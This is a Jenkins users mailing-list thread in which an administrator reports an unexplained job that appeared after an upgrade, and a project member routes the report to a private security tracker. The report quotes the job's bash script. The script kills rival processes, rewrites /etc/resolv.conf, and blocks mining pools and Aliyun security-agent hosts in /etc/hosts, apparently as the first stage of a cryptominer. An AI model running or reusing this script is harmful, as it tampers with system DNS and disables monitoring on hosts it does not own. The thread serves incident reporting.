We have locked down the system and have not had a recurrence. If there is
one, I will report it ASAP.
Thank you all for the concern :)
Cheers,
Randall
On Wednesday, 1 July 2020 09:55:06 UTC-4, Jan Monterrubio wrote:
>
> Randall/Daniel, if there does end up being malware for this release would
> you mind replying on this thread?
>
> On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
>>
>> Thanks for your report.
>>
>> I filed an issue on your behalf in the Jenkins project's private security
>> issue tracker. You should have gotten an email notification from Jira about
>> it. Please provide more information there to help us investigate.
>>
>>
>> > On 22. Jun 2020, at 19:15, Randall Becker <the....@gmail.com> wrote:
>> >
>> > Hi All,
>> >
>> > We just installed Jenkins 2.240 and suddenly there is a job with some
>> really strange content, including:
>> >
>> > #!/bin/bash
>> >
>> > threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' |
>> head -n 1);
>> > hostHash=$(hostname -f | md5sum | cut -c1-8);
>> > echo "${hostHash} - ${threadCount}";
>> > ktr () {
>> > killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>> > killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>> > killall viunix;pkill viunix;killall -s SIGKILL viunix
>> > kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>> > kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>> > kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>> > echo kill
>> > }
>> >
>> > ktr
>> > ktr
>> > ktr
>> > echo plsfoodforcatsnlove
>> > echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8'
>> >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
>> > echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0
>> 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3
>> jsrv.aegis.aliyun.com" >> /etc/hosts
>> > echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo
>> "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >>
>> /etc/hosts
>> > echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0
>> pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com"
>> >> /etc/hosts
>> > echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
>> > echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
>> > echo "0.0.0.0 minexmr.com" >> /etc/hosts
>> >
>> > This is really creepy because this script cannot possibly run on our
>> system (the good part). The bad part is that no one in our organization
>> created this job. Is it possible that there is some malware floating
>> around? Our Jenkins instance is hiding behind a firewall so there's no way
>> in.
>> >
>> > Thanks,
>> > Randall
>> >
>> > --
>> > You received this message because you are subscribed to the Google
>> Groups "Jenkins Users" group.
>> > To unsubscribe from this group and stop receiving emails from it, send
>> an email to jenkins...@googlegroups.com.
>> > To view this discussion on the web visit
>> https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
>>
>>
>>
>>
--
You received this message because you are subscribed to the Google Groups
"Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to jenkinsci-users+unsubscr...@googlegroups.com.
To view this discussion on the web visit
https://groups.google.com/d/msgid/jenkinsci-users/ee855a10-2327-40b5-95e2-8699bfc2f5d1o%40googlegroups.com.
